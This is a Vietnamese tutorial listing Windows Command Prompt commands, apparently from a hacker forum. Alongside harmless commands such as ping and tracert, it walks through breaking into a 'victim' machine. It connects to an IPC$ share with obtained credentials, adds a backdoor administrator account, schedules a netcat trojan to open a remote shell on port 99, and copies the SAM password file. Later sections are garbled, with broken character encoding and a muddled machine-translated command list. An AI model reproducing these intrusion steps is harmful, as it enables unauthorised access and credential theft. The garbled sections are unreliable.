Command Prompt là một ứng dụng rất tiện lợi có sẵn trong windows để quản lý máy tính cá nhân và quản trị mạng thông qua các câu lệnh tương tự
như Dos, tuy nhiên hệ thống câu lệnh này lại khá rườm rà.
Ngoài những câu lệnh căn bản như trong hệ điều hành MS DOS Command Prompt có một số câu lệnh mới. Sau đây là thống kê một số câu lệnh hữu
ích thường được sủ dụng nhất.
Để khởi động Command Prompt trong Windows XP bạn tìm theo địa chỉ: Start >Programs >Accessories > Command Prompt. Hoặc vào Strart >
Run (Windows + R) gõ cmd > ok.
1. Lệnh Ping:
Phân tích sự kết nối đến một máy từ xa trên mạng. Lệnh này chỉ có hiệu lực khi máy bạn đã cài giao thức TCP/IP.
Cú pháp: ping ip/host [/t][/a][/l][/n]
- ip: địa chỉ IP của máy cần kiểm tra; host là tên của máy tính cần kiểm tra. Người ta có thể sử dụng địa chỉ IP hoặc tên của máy tính.
- Tham số /t: Sử dụng tham số này để máy tính liên tục "ping" đến máy tính đích, cho đến khi bạn bấm Ctrl + C
- Tham số /a: Nhận địa chỉ IP từ tên host
- Tham số /l : Xác định độ rộng của gói tin gửi đi kiểm tra. Một số hacker sử dụng tham số này để tấn công từ chối dịch vụ một máy tính (Ping of Death -
một loại DoS), nhưng tôi nghĩ là hacker có công cụ riêng để ping một gói tin lớn như thế này, và phải có nhiều máy tính cùng ping một lượt.
- Tham số /n : Xác định số gói tin sẽ gửi đi. Ví dụ: ping 174.178.0.1/n 5
Công dụng : Sử dụng để kiểm tra xem một máy tính có kết nối với mạng không. Lệnh Ping sẽ gửi các gói tin từ máy tính bạn đang ngồi tới máy tính
đích. Thông qua giá trị mà máy tính đích trả về đối với từng gói tin, bạn có thể xác định được tình trạng của đường truyền (chẳng hạn: gửi 4 gói tin
nhưng chỉ nhận được 1 gói tin, chứng tỏ đường truyền rất chậm (xấu)). Hoặc cũng có thể xác định máy tính đó có kết nối hay không (Nếu không kết
nối,kết quả là Unknow host)
2. Lệnh Tracert:
Cú pháp: tracert ip/host
Công dụng : Cho phép bạn "nhìn thấy" đường đi của các gói tin từ máy tính của bạn đến máy tính đích, xem gói tin của bạn vòng qua các server nào,
các router nào Quá hay nếu bạn muốn thăm dò một server nào đó.
. Lệnh Net Send:
Gởi thông điệp trên mạng (chỉ sử dụng trên hệ thống máy tính Win NT/2000/XP):
Cú pháp: Net send ip/host thông_điệp_muốn_gởi
Công dụng:
Lệnh này sẽ gửi thông điệp tới máy tính đích (có địa chỉ IP hoặc tên host) thông điệp: thông_điệp_muốn_gởi.
Trong mạng LAN, ta có thể sử dụng lệnh này để chat với nhau. Bạn cũng có thể gởi cho tất cả các máy tính trong mạng LAN theo cấu trúc sau :
Code: Net send * [thông điệp]
Lưu ý: thông điệp bạn gửi đi không được có dấu cách (khoảng trắng)

Cú pháp: Net View [\\computer|/Domain[:ten_domain]]
Công dụng:
Nếu chỉ đánh net view [enter], nó sẽ hiện ra danh sách các máy tính trong mạng cùng domain quản lý với máy tính bạn đang sử dụng.
Nếu đánh net view \\tenmaytinh, sẽ hiển thị các chia sẻ tài nguyên của máy tính tenmaytinh . Sau khi sử dụng lệnh này, các bạn có thể sử dụng lệnh
net use để sử dụng các nguồn tài nguyên chia sẻ này.
. Lệnh Net Use:
Cú pháp: Net use \\ip\ipc$ "pass" /user:"######"
- ip: địa chỉ IP của victim.
- ######: user của máy victim
- pass: password của user
Giả sử ta có đc user và pass của victim có IP là 68.135.23.25 trên net thì ta đã có thể kết nối đến máy tính đó rùi đấy! Ví dụ: user: vitim ; pass :12345 .
Ta dùng lệnh sau:
Code: Net use \\68.135.23.25\ipc$ "12345" /user:"victim"
Công dụng: Kết nói một IPC$ đến máy tính victim (bắt đầu quá trình xâm nhập).
9. Lệnh Net User:
Cú pháp: Net User [username pass] [/add]
- Username : tên user cấn add
- pass : password của user cần add
Khi đã add được user vào rùi thì ta tiến hành add user này vào nhóm administrator.
Code: Net Localgroup Adminstrator [username] [/add]
Công dụng:
Nếu ta chỉ đánh lệnh Net User thì sẽ hiển thị các user có trong máy tính.
2
Nếu ta đánh lệnh Net User [username pass] [/add] thì máy tính sẽ tiến hành thêm một người dùng vào.
Ví dụ: ta tiến hành add thêm một user có tên là :xuanhoa , password là :banvatoi vào với cấu trúc lệnh như sau:
Code: Net User xuanhoa banvatoi /add
Sau đó add user xuanhoa vào nhóm adminnistrator
Code: Net Localgroup Administrator xuanhoa /add
10. Lệnh Shutdown:
Cú pháp: Shutdown [-m \\ip] [-t xx] [-i] [-l] [-s] [-r] [-a] [-f] [-c "commet] [-d up:xx:yy] (áp dụng cho win XP)

sẽ hưỡng dẫn kĩ hơn.
14. Lệnh Net Time:
Cú pháp: Net Time \\ip
Công dụng: Cho ta biết thời gian của victim, sau đó dùng lệnh AT để khởi động chương trình.
15. Lệnh AT:
3
Cú pháp: AT \\ip
Công dụng: Khởi động các ứng dụng trên máy victim
Ví dụ: ở đây tôi có con trojan tên nc.exe (NC là từ viết tắc của NETCAT nó là một telnet server với port 99) và đc copy lên máy victim rồi. Đầu tiên ta
cần biết thời gian của victim có IP là : 68.135.23.25 .
Code: Net Time \\68.135.23.25
Bây giờ nó sẽ phản hồi cho ta thời gian của victim, ví dụ : 12:00.
Code: AT \\68.135.23.25 12:3 nc.exe
Đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99.
16. Lệnh Telnet:
Cú pháp: telnet host port
VD: telnet 68.135.23.25 99
Công dụng: Kết nối đến host qua port xx. Gõ telnet /? để biết thêm chi tiết.
17. Lệnh COPY:
Cú pháp: COPY [nguồn] [đích]
Công dụng: Copy file. Gõ copy/?để biết thêm.
Ví dụ:chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1
Code: Copy Index.html \\127.0.0.1\C$\index.html
nếu bạn copy lên folder winNt
Code: Copy index.html \\127.0.0.1\admin$\index.html
muốn copy files trên máy victm thì bạn gõ vào :
Code: Copy \\127.0.0.1\Admin$\repair\sam._c:\
18. Lệnh SET:
Cú pháp: SET
Công dụng: Displays, sets, or removes cmd.exe enviroment variables.

Đầu tiên ta dùng lệnh tasklist để biết được groccess id của chương trình cần tắt.
Code: tasklist
Ở đây tôi thí dụ như tôi cần DWK có groccess id là 524 thì ta dùng lệnh taskkill để tắt nó đi như sau:
Code: taskkill /PID 524 /f
Tham số /f là để tắt ứng dụng đó đi một cách hoàn toàn!
26. Lệnh Compact:
Cú pháp: Compact [:ổ đĩa] [đường dẫn]<tên file>[/c] [/s] [/a] [/f] [/q]
- tham số /c : chỉ định nén một file nào đó
- tham số /u : giải nén một file nào đó
Các tham số khác bạn gõ lện compact/? để tìm hiểu thêm.
Công dụng: Tương tự như chức năng tiết kệm dung lượng đĩa trên Windows XP hay 2003 (Vista) - chỉ có khi dùng NTFS là "Compress Contents To
Save Disk Space". Các bạn có nhiều kiểu làm như click phải chuột vào một file chọn Properties -> Advanced rồi check vào ô tiết kiệm dung lượng cho
file này "Compress file to save disk space". Nhưng khi các bạn muốn nén tất các file thì Compact là lựa chọn tốt nhất với tên file là *.*.
Ví dụ: Nén tất cả các file có phần mở rộng là exe trong ổ :C ta gõ lệnh sau.
Code: compact /c *.exe
27. Lệnh control:
Cú pháp: control
Công dụng: Mở control panel bằng CMD
28. Lệnh getmac:
Cú pháp: getmac
Công dụng: lấy thông tin địa chỉ MAC (Media Access Control) từ card mạng.
29. Lệnh systeminfo:
Cú pháp: systeminfo
Công dụng: hiện thị thông tin của hệ thống từ cấu hình cơ bản, loại CPU, khu vực địa lý, các bản hotfix (bản cập nhập) đã cài trong máy, v.v
30. Lệnh tree:
Cú pháp: tree [:ổ đĩa][đường dẫn] [/f] [/a]
5
- Tham s /f : hin th tờn ca file trong mi th mc
- Tham s /a : Hin th tờn file hoc th mc bng bng mó ASCII thay vỡ tờn y ca ng dng.
Cụng dng: Hin th cu trỳc th mc dng cõy!

Xúa m n hỡnh
CD <ng dn th mc>
Chuyn th mc hin h nh sang th mc khỏc
MD <D th mc mi>
To th mc mi
RD < D th mc>
Xúa th mc, th mc cn xúa phi rng
DEL < D 1 hoc 1 nhúm tp tin>
Xúa tp tin
COPY <D 1 nhúm t.t> <D th mc>
To 1 bn sao ca 1 nhúm tp tin v t ti 1 th mc c ch nh
REN <D 1 tp tin/th mc> <D tp tin/th mc mi>
6
i tờn tp tin hoc th mc
PATH <D th mc>
Ghi nh ng dn th mc v o b nh
VER
Xem version ca phiờn bn DOS ang s dng
TIME
Xem thi gian h thng
TYPE <D tp tin>
Gi ni dung ca tp tin ra 1 thit b xut
VOL <ký t a>
Vớ d : VOL C:
Xem thụng tin (nhón, kớch thc ) v a
MORE <D tp tin>
Xem ni dung tp tin trờn tng trang m n hỡnh
COPY CON <D tp tin mi>
To tp tin mi, sau khi gừ lnh, ngi s dng gừ tip ni dung cho tp tin mi, v gừ F6 + enter kt thỳc
FORMAT.COM

Compact Hiển thị nén hoặc thay đổi của các tập tin trên NTFS của phân vùng.
Chuyển đổi FAT khối tin vào NTFS. Bạn không thể chuyển đổi
lái xe hiện nay.
COPY Bản sao một hay nhiều tập tin vào một vị trí.
DATE Hiển thị hoặc đặt ra những ngày.
DEL xoá một hoặc nhiều tập tin.
DIR Hiển thị một danh sách các tập tin và th mục con trong một th mục.
DISKCOMP so sánh các nội dung của hai đĩa mềm.
DISKCOPY bản sao các nội dung của một trong những đĩa mềm khác.
DOSKEY Sửa đổi dòng lệnh, recalls Windows lệnh, và tạo ra các macros.
ECHO Hiển thị bài viết, hoặc lợt echoing lệnh trên hoặc tắt.
Kết thúc ENDLOCAL địa phơng về môi trờng thay đổi trong một đợt tập tin.
Xoá bỏ xoá một hoặc nhiều tập tin.
Thoát khỏi tha CMD.EXE các chơng trình (lệnh phiên dịch).
FC so sánh hai tập tin hoặc bộ tác phẩm, và hiển thị sự khác biệt
giữa chúng.
TìM Tìm kiếm văn bản cho một chuỗi ký tự trong một tập tin hoặc các tập tin.
FINDSTR tìm kiếm cho strings trong tập tin.
CHO chạy một lệnh cho mỗi tập tin trong một bộ các tập tin.
Format Định dạng một đĩa để sử dụng cùng với Windows.
Hiển thị FTYPE sa oi hay tập tin đợc sử dụng trong các loại tập tin mở rộng các hiệp hội.
Goto directs Windows lệnh phiên dịch cho một nhãn hàng trong một
7
hàng loạt chơng trình.
Windows GRAFTABL Cho phép mở rộng để hiển thị một ký tự đặt trong đồ họa
chế độ.
TRợ GIúP Trợ giúp Cung cấp thông tin cho Windows lệnh.
NếU có điều kiện thực hiện trong hàng loạt các chơng trình chế biến.
LABEL Creates, thay đổi, hoặc xoá các khối lợng của một nhãn đĩa.
MD Creates một th mục.

VOL Hiển thị một nhãn đĩa khối lợng và số sê-ri.
XCOPY bản sao các tập tin và th mục cây.
8
ANSI.SYS Xác định các chức năng mà thay đổi hiển thị đồ họa, điều khiển con trỏ chuột di chuyển, và
ấn phím.
APPEND Causes MS-DOS để tìm trong th mục khác khi chỉnh sửa một tập tin hoặc chạy một
lệnh.
ARP Displays, cho biết thêm, và loại bỏ các thông tin arp từ thiết bị mạng.
Gán Gán ký tự ổ đĩa vào một lá th khác.
PGS Xem các tập tin hiệp hội.
AT Schedule một thời gian để thực thi lệnh hay chơng trình.
ATMADM danh sách các kết nối và địa chỉ đợc thấy bởi Windows quản lý cuộc gọi ATM.
ATTRIB Hiển thị và thay đổi tập tin thuộc tính.
BATCH Recovery console lệnh đó thực hiện một loạt các lệnh trong một tập tin.
Bootcfg Phục hồi lệnh điều khiển cho phép ngời dùng xem, chỉnh sửa, và xây dựng lại
boot.ini
BREAK Enable / Ctrl + C vô hiệu hóa tính năng này.
CACLS Xem và chỉnh sửa file ACL's.
GọI gọi một tập tin thực thi từ một tập tin thực thi.
CD Thay đổi th mục.
CHCP Supplement bàn phím quốc tế và các thông tin thiết lập ký tự.
Chdir Thay đổi th mục.
CHKDSK Kiểm tra ổ đĩa cứng đang chạy FAT lỗi.
CHKNTFS Kiểm tra ổ đĩa cứng đang chạy NTFS cho lỗi.
CHOICE Chỉ định một danh sách các lựa chọn nhiều trong một tập tin thực thi.
CLS Xóa màn hình.
CMD Mở trình thông dịch lệnh.
Dễ dàng thay đổi màu nền trớc và màu nền của MS-DOS cửa sổ.
COMMAND Mở trình thông dịch lệnh.
COMP Compares files.

FDISK hữu ích đợc sử dụng để tạo ra các phân vùng trên ổ đĩa cứng.
TìM Tìm văn bản trong vòng một tập tin.
FINDSTR tìm kiếm cho một chuỗi các văn bản trong vòng một tập tin.
Fixboot Writes một khu vực khởi động mới.
Fixmbr Writes một hồ sơ mới để khởi động một ổ đĩa.
FOR Boolean đợc sử dụng trong các tập tin lô.
FORMAT Command để xóa và chuẩn bị một ổ đĩa.
FTP Command để kết nối và vận hành trên một máy chủ FTP.
FTYPE Hiển thị hoặc sửa đổi các loại tập tin đợc sử dụng trong các hiệp hội phần mở rộng tập tin.
GOTO Moves một lô tập tin vào một nhãn cụ thể hoặc địa điểm.
GRAFTABL Show mở rộng ký tự trong chế độ đồ họa.
HELP Hiển thị một danh sách các lệnh và giải thích ngắn gọn.
NếU Cho phép cho các tập tin batch để thực hiện chế biến điều kiện.
IFSHLP.SYS 32-bit file manager.
IPCONFIG mạng lệnh để xem các thiết lập card mạng và các giá trị đợc giao.
KEYB Thay đổi cách bố trí của bàn phím.
LABEL Thay đổi nhãn của một ổ đĩa.
9
LH Load một trình điều khiển thiết bị vào bộ nhớ cao.
listSVC Phục hồi lệnh điều khiển có hiển thị dịch vụ và trình điều khiển.
LOADFIX Load một chơng trình nói trên là ngời đầu tiên 64k.
LOADHIGH Load một trình điều khiển thiết bị vào bộ nhớ cao.
KHóA Khóa ổ đĩa cứng.
LOGON Recovery console lệnh để cài đặt danh sách và cho phép quản trị viên đăng nhập.
Đồ Hiển thị tên thiết bị của đĩa.
MD Command để tạo một th mục mới.
MEM Hiển thị bộ nhớ trên hệ thống.
Mkdir lệnh để tạo ra một th mục mới.
MODE Modify cảng hoặc cài đặt hiển thị.
THÊM Hiển thị một trang tại một thời điểm.

SETVER Change MS-DOS, phiên bản cũ hơn để lừa MS-DOS các chơng trình.
Hỗ trợ CHIA Sẻ lắp cho chia sẻ tập tin và khóa khả năng.
Shift Thay đổi vị trí của các tham số có thể thay thế trong một chơng trình batch.
SHUTDOWN Shutdown máy tính từ MS-DOS prompt.
SMARTDRV Tạo một đĩa trong bộ nhớ cache thông thờng hoặc bộ nhớ mở rộng.
Quay Phân loại đầu vào và đầu ra để hiển thị màn hình.
BắT ĐầU Bắt đầu một cửa sổ riêng biệt trong Windows từ MS-DOS prompt.
Subst thay thế một th mục trên máy tính của bạn cho một ký tự ổ đĩa.
TắC Hủy bỏ thêm chức năng từ MS-DOS.
SYS Chuyển hệ thống tập tin vào ổ đĩa.
TELNET Telnet đến một máy tính / thiết bị từ dấu nhắc.
THờI xem hoặc sửa đổi thời gian hệ thống.
TITLE Thay đổi tiêu đề của MS-DOS của cửa sổ.
Tracert giác xem một mạng lới các gói dữ liệu trên đờng qua mạng.
Tree xem một cây thị giác của ổ đĩa cứng.
LOạI Hiển thị các nội dung của một tập tin.
Undelete lấy lại một tập tin đó đã bị xóa.
UNFORMAT Unformat một ổ đĩa cứng.
UNLOCK Unlock một ổ đĩa.
VER Hiển thị các thông tin phiên bản.
XáC MINH Cho phép hoặc vô hiệu hóa tính năng này để xác định xem các tập tin đã đợc viết đúng cách.
VOL Hiển thị các thông tin về khối lợng ổ định.
Xcopy Copy nhiều tập tin, th mục, và / hoặc ổ đĩa từ một địa điểm khác.
10